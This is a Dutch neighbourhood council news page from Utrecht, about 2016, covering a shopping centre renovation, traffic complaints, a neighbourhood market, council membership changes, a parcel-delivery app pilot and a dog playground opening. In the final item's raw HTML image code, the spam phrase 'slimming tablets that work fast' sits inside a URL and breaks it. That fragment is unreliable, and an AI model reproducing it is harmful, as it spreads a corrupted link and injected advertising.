Een beperkte opsomming van de onderwerpen die aan de orde zijn geweest en wij als Wijkraad Noordoost belangrijk vinden als echte verbetering:

 1. Fietsers, brommers en de huidige busbaan worden rond de kerk geleid waardoor er een plein ontstaat dat veilig is en als ontmoetingsplein kan worden gebruikt.
 2. Het huidige aantal bomen wordt behouden. De bomen die op het nieuwbouwgebied staan worden verplaatst en niet omgezaagd.
 3. Inpandig laden & lossen van goederen bij AH; dit heeft als voordeel dat de overlast van vrachtwagens voor direct omwonenden een stuk minder is.
 4. De bloemenzaak op het plein blijft behouden en krijgt prominente plek.
 5. Parkeerplaatsen komen centraal (en gedeeltelijk op het dak van de nieuwbouw), dit voorkomt zoekverkeer en luchtvervuiling.
 6. De gevels krijgen aan de buitenkant een mooier aanzicht en er komen extra woningen bij (met een beter energielabel).
 7. Het winkelcentrum krijgt groene gevels en zonnepanelen.
 8. Sluipverkeer tussen Voordorp en Tuindorp wordt aangepakt. De Eijkmanlaan wordt nu aangepast.

Dit project heeft een looptijd van zo’n tien jaar en gedurende het traject komen er nieuwe inzichten. Hier is altijd serieus naar gekeken door alle partijen.

De toenemende leegstand in winkelcentra (met name in de non food sector) is een punt van zorg en is ook uitgebreid aan de orde gekomen in de diverse Klankbordgroep (KBG) bijeenkomsten. Van de zijde van zowel de projectontwikkelaar, de gemeente als van de zijde van de eigenaar van het winkelcentrum (en de bovengelegen woningen) is aangegeven, dat er ruimschoots belangstelling is van potentiële huurders. Bovendien wordt dit door diverse onderzoeken onderschreven.

Het onverhoopt niet doorgaan van dit project vormt de grootste bedreiging voor zowel het winkelcentrum en de bovenliggende woningen. Juist dan dreigt leegstand en verpaupering.

De gevreesde verkeersoverlast zal, indien er geen maatregelen worden genomen, ook zonder uitbreiding van het winkelcentrum plaatsvinden. Zolang de A27 nog niet is uitgebreid en de Noordelijke Ring Utrecht nog niet klaar is zal verkeer altijd proberen een snellere route te vinden.

Facebooktwittergoogle_pluspinterest

Verkeerstromen Tuinwijk (Pieter van Nieuwlandstraat)

De afgelopen maand zijn er veel reacties binnengekomen via de website op het advies van de wijkraad m.b.t. de verkeersstroom Tuinwijk, in het bijzonder op het onderdeel over de voorgestelde pilot met eenrichtingsverkeer in de Pieter Nieuwlandstraat.

Binnengekomen reacties bij WRNO

Tot op heden hebben we op alle inzenders als volgt gereageerd:
Dank voor uw reactie. De wijkraad brengt al vele jaren de verkeersstroom door Tuinwijk onder de aandacht van de gemeente. Wij staan een integrale benadering voor voor de hele route vanaf de Oudenoord tot en met de drie wegen die op de Kardinaal de Jongweg uitkomen (Antonius Matthaeuslaan, Ingenhouszstraat en Pieter Nieuwlandstraat). Zie daarvoor onder meer  het eerste deel van het door u genoemde advies van de wijkraad. Uw reactie als bewoner van een andere straat in Tuinwijk is voor ons als wijkraad net zo belangrijk als van een bewoner uit de Pieter Nieuwlandstraat. Wij kunnen ons goed voorstellen dat u reageert op de pilot eenrichtingsverkeer PN-straat. U was niet de enige in deze zin. De vraag is ook terecht of de wijkraad zich met dergelijke concrete voorstellen moet bezighouden of die moet ondersteunen. Wij zullen dit in de komende wijkraadvergadering aan de orde stellen en heroverwegen. Na de vergadering zullen we u nader informeren en graag verder met u (en andere buurtbewoners) in gesprek te gaan.

Op 11 oktober heeft de wijkraad besloten het op 1 juli uitgebrachte advies aan te passen, dit is ook aan alle betrokkenen gemeld. De brief aan het college hierover vindt u hieronder.

Albert van Beek (Secretaris Wijkraad Noordoost)

Brief aan het college van WRNO

Facebooktwittergoogle_pluspinterest

SOCIALE BUURTMARKT VEEMARKT zaterdag 29 oktober

zoals-het-was

Wie bouwt er mee aan de Sociale Buurtmarkt in, van en voor de Veemarkt?

Op 29/10/2016  van 11.00 – 17.00 uur

In het Grand Café van

Woonzorgcentrum Voorveldse Hof

Blaarkopstraat 1, Veemarkt te Utrecht

 • Woon jij in de Veemarkt?
 • Heb jij iets te melden of is er een activiteit die je zou willen organiseren?
 • Is er iets wat je aan de orde zou willen stellen, of delen met buurtbewoners?
 • Lijkt je het leuk om mee te denken over de invulling van de Sociale Buurtmarkt?

Wij nodigen je van harte uit om mee te denken over de vorm en de invulling van de Sociale Buurtmarkt in de Veemarkt, georganiseerd door de Wijkraad Noordoost i.s.m. Woonzorgcentrum Voorveldse Hof en actieve bewoners en organisaties uit de buurt.

Er zijn verschillende vormen waarin je kunt bijdragen, onmisbaar in de uitvoering:  vrijwilligers, verkopers, bezoeker, voorlichters, delers, bouwers, aanjagers in de wijk ….

 

Wat is een Sociale Buurtmarkt?
Allereerst een plek waar mensen samenkomen. Op zoek naar informatie, of gewoon voor de gezelligheid. De sociale buurtmarkt is om te ontmoeten, te verbinden, te ontdekken en nieuwe mensen, organisaties en initiatieven te leren kennen. De markt is daarom ook een podium voor ondernemers, initiatieven, organisaties en bewoners uit de buurt. Op deze manier kunnen er interessante verbindingen worden gemaakt.

Neem contact op via veemarkt@wrno.nl als je wilt bijdragen, vermeld a.u.b. ook je telefoonnummer.

ENQUETE

Nog beter: vul de enquête in op https://nl.surveymonkey.com/r/SW9TTQ2 waarin we onderzoeken wat bewoners in de Veemarkt belangrijk vinden en ook ingaan op de Sociale Buurt markt. De sluitingsdatum is 27 oktober 2016.

Hartelijk dank en groet, Gerdine van Ramshorst, namens de wijkraad Noordoost

veemarkt_flyer_1veemarkt_flyer_2

Facebooktwittergoogle_pluspinterest

Klachten over onveilige verkeerssituatie Sartreweg

Diverse wijkbewoners hebben bij de wijkraad aandacht gevraagd voor een vreselijk onveilige situatie bij de Sartreweg na de verbouwing van de Kapteynlaan en Romerostraat.
Daar hebben auto’s nu voorrang, en vooral de bocht Sartrelaan is vreselijk onveilig. Auto’s komen daar regelmatig met een noodgang om de hoek zeilen en er zijn al diverse bijna-ongelukken gezien, waarbij fietsers niet door hadden dat auto’s daar met hoge snelheid rijden. Ook op de volgende kruising waar eerst fietsers voorrang hadden, hebben auto’s nu voorrang gekregen. Vooral jonge fietsers gaan dit echt niet door hebben…
En er rijden daar heel veel jonge fietsertjes, op weg naar sport (Hercules, Sporting).
Dit gaat echt ongelukken tot gevolg hebben, en dat was toch niet de bedoeling vanuit de gemeente. Wij vragen wijziging van deze situatie bij het volgende verkeersoverleg.

Facebooktwittergoogle_pluspinterest

Tuinders De Driehoek internationaal onderscheiden

De tuinders van De Ecologische Driehoek (Winklerlaan) hebben van de Internationale Volkstuindersorganisatie een onderscheiding ontvangen vanwege bijzondere sociale activiteiten. Namelijk, vanwege hun inzet om asielzoekers met een stukje Nederlands cultuurgoed te laten kennismaken. Ze hebben o.a. een rol bij wieden op het complex.
De Driehoek is daarnaast door de Raad van Europa uitgekozen als voorbeeldproject in het kader van de Europese week van de lokale democratie. Hier kunnen jullie daar meer over lezen: http://sedl.alnetis.fr/en/425-office-international-du-coin-de-terre-et-des-jardi/
Hierbij de link naar een filmpje over De Driehoek.

Facebooktwittergoogle_pluspinterest

Woningbouw naast Gerrit Rietveld College gestart

Er komen 79 nieuwbouwwoningen op de plek van het oude Gerrit Rietveld College aan de Eykmanlaan. Bouwverkeer gaat niet door Tuindorp en er staat een vast hek rondom het bouwterrein. In juli is het boren van de palen begonnen, nu wordt er verder gewerkt aan de fundering. Eind 2017 is de bouw helemaal afgerond.

Meer over dit project

Vragen over dit project? Stuur een e-mail naar de projectleider R. Hilhorst: noordoost@utrecht.nl.

Facebooktwittergoogle_pluspinterest

Nieuw lid: Liesbeth Jacobs

De vacature die nog was achtergebleven voor de Vogelenbuurt is inmiddels ingevuld met een nieuwkomer in de wijkraad: Liesbeth Jacobs. In de bijeenkomst van 13 september is Liesbeth voorgedragen en aangenomen als nieuw lid. Zij zal zich nog uitgebreider voorstellen in ons katern in Mens & Wijk.

Facebooktwittergoogle_pluspinterest

Joyce Parlevliet verlaat de wijkraad

In onze bijeenkomst van 13 september hebben we afscheid genomen van Joyce als lid van deze wijkraad. Ze heeft ongeveer tien jaar een grote bijdrage geleverd aan vele werkzaamheden, vooral aan duurzaamheid en groen maar ook aan de communicatie met onze achterban. De wijkraad heeft Joyce bedankt voor haar grote inzet, we zullen haar gaan missen. Ze gaat wel zeker verder met de jaarlijkse ‘Groen-moet-je-doen’ dag en zal ook nog enkele wijkraadtaken afronden. Haar plaats vanuit de buurt Wittevrouwen is hiermee vacant. Belangstellenden vragen we zich te melden bij het secretariaat: info@wrno.nl.

 

Facebooktwittergoogle_pluspinterest

Confy, voor een beter milieu (efficiënte pakketbezorging)

Recent onderzoek van onderzoeksbureau TNO heeft aangetoond dat bestelbusjes maar liefst zes maal meer stikstofoxide uitstoten dan werd aangenomen. Wij hebben een app bedacht die dit probleem meteen aanpakt door te beginnen bij jouw leefomgeving. Een bijkomend voordeel is dat je niet langer uren thuis hoeft te wachten op een pakketje dat bij je bezorgd wordt.

Wat is Confy?
Confy is de naam van een door de Gemeente Utrecht ondersteund initiatief dat gelanceerd wordt om pakketbezorging voor iedereen makkelijker te maken en het aantal bezorgbusjes op de weg terug te dringen. In de app geef je precies aan wanneer jij je pakketje kunt ontvangen. Dit kan geheel automatisch door je gps-locatie te delen. Wil je dit niet, dan kun je dat ook handmatig aangeven. Via Confy komt je bezorger automatisch bij iemand anders in je netwerk terecht om jouw pakketje voor jou te ontvangen als jij dit niet kunt. Dit kan een buur of een goede vriend zijn, of dat gezellige groentezaakje op de hoek.

Schoner, groener, beter.
Behalve de benoemde tijdwinst voor jou omdat het pakketje altijd wordt afgeleverd, is er ook tijdwinst voor de bezorger. De bezorger wordt direct naar een open deur geleid waardoor hij sneller en efficiënter door de wijk beweegt. De grote bestelbussen hoeven nu minder heen en weer te rijden door de wijk, wat minder uitlaatgassen betekent en dus een schonere lucht in de buurt. Je pakketje ophalen bij de buren kan weer een goede reden zijn om eens fijn te praten. Kortom, de wijk wordt een heel stuk schoner en nog gezelliger. Dat is wat we met Confy willen bereiken.

Pilot.
Op 19 september starten we met ondersteuning van de Gemeente Utrecht een pilot in Wittevrouwen. Wij vragen je om de app te installeren en te gaan gebruiken. Gebruiksvriendelijkheid staat centraal, wat de belangrijkste reden is om samen een pilot uit te voeren. Als je graag mee wilt werken aan een schoner milieu en een gezellige buurt, kun je als je in Wittevrouwen woont de Confy app vanaf 19 september helemaal gratis op je telefoon zetten. Wanneer je dan iets online bestelt kun je met Confy precies aangeven wanneer je pakketjes kunt ontvangen. Wil of kun je geen pakketjes ontvangen, dan wordt de bezorger direct doorverwezen naar iemand in je netwerk.

Wie zijn wij?
Ons kleine team bestaat uit een mix van bekende namen uit de retail en enthousiaste jonge ondernemers. We komen zelf uit de buurt van Utrecht en op deze manier proberen we de kwaliteit van het leven in en rond Utrecht beter te maken. We kunnen het echter niet alleen, daarom brengen we Confy nu eerst naar Wittevrouwen en daarna in Voordorp voor een uitgebreide pilot in een living lab ondersteund door de Gemeente Utrecht. Vervolgens gaan we voor heel Utrecht.

Als jij samen met ons wil werken aan een gezellige en schone leefomgeving volg ons dan ook op Twitter, Facebook en onze website:

https://twitter.com/myconfy
https://www.facebook.com/myconfy/?fref=ts
https://www.myconfy.com/

 

Facebooktwittergoogle_pluspinterest

Hoe, Wat, Waar, Wie de wijkraad?

Wij geven gevraagd en ongevraagd advies aan het College van Burgemeester en Wethouders van Utrecht over vraagstukken die spelen in de wijk Noordoost. Ons advies berust meestal op gesprekken met bewonersgroepen uit de buurt waar het onderwerp speelt. De afgelopen jaren is er advies gegeven over de maximum snelheid op de Kardinaal de Jongweg, de vernieuwing van Winkelcentrum De Gaard, Stadspark De Groene Kop, het Veemarktterrein en bouwprojecten bij het Gerrit Rietveld College en het veld naast de Van Lieflandlaan. Alle adviezen zijn te vinden op de website van de wijkraad. Behalve opstellen van schriftelijke adviezen werkt de wijkraad aan overleg met ambtenaren, onderhouden van contacten met buurtcomite’s en allerlei actieve burgers.  Wist u dat de maandelijkse vergaderingen van de Wijkraad openbaar zijn?

U kunt ook onderwerpen die u in uw buurt belangrijk vindt, inbrengen voor een vergadering.

Kijk op www.wrno.nl wanneer de de wijkraad Noordoost vergadert. Bent u geïnteresseerd in wat er zich afspeelt in de wijk Noordoost en wilt u een actieve bijdrage leveren, word dan lid van de Wijkraad Noordoost en geef u op voor een van de volgende clusters: Wonen & Ruimtelijke ordening, Duurzaamheid & Natuur, Wijkeconomie & ZZP, Verkeer & Milieu of Zorg & Welzijn.

In het laatste weekend van de maand wordt de nieuwsbrief verzonden. Aan de rechterkant ziet u de namen van alle buurten in de wijk. Klik aan waar u meer informatie over wilt.

Facebooktwittergoogle_pluspinterest

Het wijkactieprogramma 2017

Elk jaar wordt er een wijkactieprogramma opgezet waarin staat welke projecten en acties de gemeente in een bepaald jaar verwacht uit te voeren. Dit programma komt tot stand door middel van gesprekken met betrokken gemeenteambtenaren, de wijkraad, professionals en burgers in de wijk.

De komende jaren betreffen de wijkambities drie speerpunten waaronder de verschillende acties en projecten worden opgehangen.

 1. Verkeer en parkeren. Twee doelstellingen:
  1. Verhogen verkeersveiligheid;
  2. Meer ruimte voor fietsparkeren;
 2. Wonen, welzijn en zorg. Twee doelstellingen:
  1. Behoud en versterking inzet vrijwilligers;
  2. Aansluiting vraag en aanbod huisvesting en voorzieningen voor ouderen;
 3. Openbare ruimte en duurzaamheid. Twee doelstellingen:
  1. Behoud kwaliteit openbare ruimte en groenvoorzieningen;
  2. Meer vernieuwende initiatieven op het gebied van milieu en duurzaamheid.

Daarnaast is er nog een categorie complexe projecten en trajecten waaronder momenteel Lauwerecht-Noord met ruim 800 woningen en Zorgcentrum Tuindorp-Oost vallen. Verder zal er naar verwachting in 2017 ook gestart worden met de renovatie/verbouwing van de Gaard.

Voor meer informatie over de wijkambities 2014-2018, het wijkactieprogramma voor Noordoost en welke projecten/acties precies hangen onder de speerpunten en doelstellingen kunt u de websites www.utrecht.nl/wijkambities of www.utrecht.nl/wijkactieprogramma raadplegen. Mocht u zelf een idee, plan of initiatief hebben of een bijdrage willen leveren aan de uitvoering van een van de projecten/acties, schroom dan niet en neem contact op met het wijkbureau Noordoost (030-2860000 of noordoost@utrecht.nl) en/of de wijkraad Noordoost (www.wijkraadnoordoost.nl/contact).

Facebooktwittergoogle_pluspinterest

Duifstraat = Leefstraat

IMG_2532Vanaf juli is de Duifstraat tijdelijk een Leefstraat geworden. De auto’s zijn vervangen door ‘groen’ (al is het gras nep). Er worden allerlei activiteiten georganiseerd. Midden op straat is er een speelplaats ingericht en er zijn planten- en groentenbakken geplaatst. Het is een enorm succes en voor herhaling vatbaar, misschien op een andere plaats in NO?IMG_2534

Facebooktwittergoogle_pluspinterest

Ouderenhuisvesting met ouderen-verhuisadviseur

Er wonen in Noordoost zo’n 700 tachtigplussers zelfstandig (van 2.300 65-plussers). Vaak wonen ze in de voormalige echtelijke woning waarin hun kinderen zijn opgegroeid, al of niet met hun partner. Die woning is intussen veel te groot geworden en te duur, moeilijk te onderhouden, te ver van de winkels en het openbaar vervoer. Niet meer comfortabel dus. De hypotheek is afbetaald en er is dus financiële ruimte om elders (levensloopbestendig) te gaan wonen.

Van zulke woningen worden er in de komende paar jaar wel 300 gebouwd in Noordoost. Gaan de mensen die erbij gebaat zouden zijn zelf de weg ernaar toe vinden? Sommigen wel, velen niet. Daarom wil de Wijkraad Noordoost dat er een ouderen-verhuisadviseur komt.

Gister sprak de Wijkraad hierover met de wethouders Paulus Jansen (wonen) en Kees Diepeveen (zorg en welzijn). “Samen Noordoost” was er ook bij, evenals “Mens en Wijk”.

foto’s : Vicky Pronk

ouderen enw wonen 1 MB ouderen enw wonen 1 MB-10 ouderen enw wonen 1 MB-11 ouderen enw wonen 1 MB-12 ouderen enw wonen 1 MB-2 ouderen enw wonen 1 MB-3 ouderen enw wonen 1 MB-4ouderen enw wonen 1 MB-6 ouderen enw wonen 1 MB-5  ouderen enw wonen 1 MB-7 ouderen enw wonen 1 MB-8 ouderen enw wonen 1 MB-9

Facebooktwittergoogle_pluspinterest

Opening hondenspeelplaats Loevenhoutensedijk

Op zaterdag 27 augustus 2016 van 14-15u voor U en uw hond(en).<img class="alignnone size-full wp-image-741548" src="http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin.png" alt="20160827 14 uur uitnodiging opening hondenspeeltuin" width="1202" height="815" srcset="http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin.png 1202w, http://www.wijkraadnoordoost slimming tablets that work fast.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-300×203.png 300w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-768×521.png 768w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-1024×694.png 1024w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-147×100.png 147w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-60×40.png 60w, http://www.wijkraadnoordoost.nl/wp-content/uploads/20160827-14-uur-uitnodiging-opening-hondenspeeltuin-442×300.png 442w” sizes=”(max-width: 1202px) 100vw, 1202px” />

Facebooktwittergoogle_plus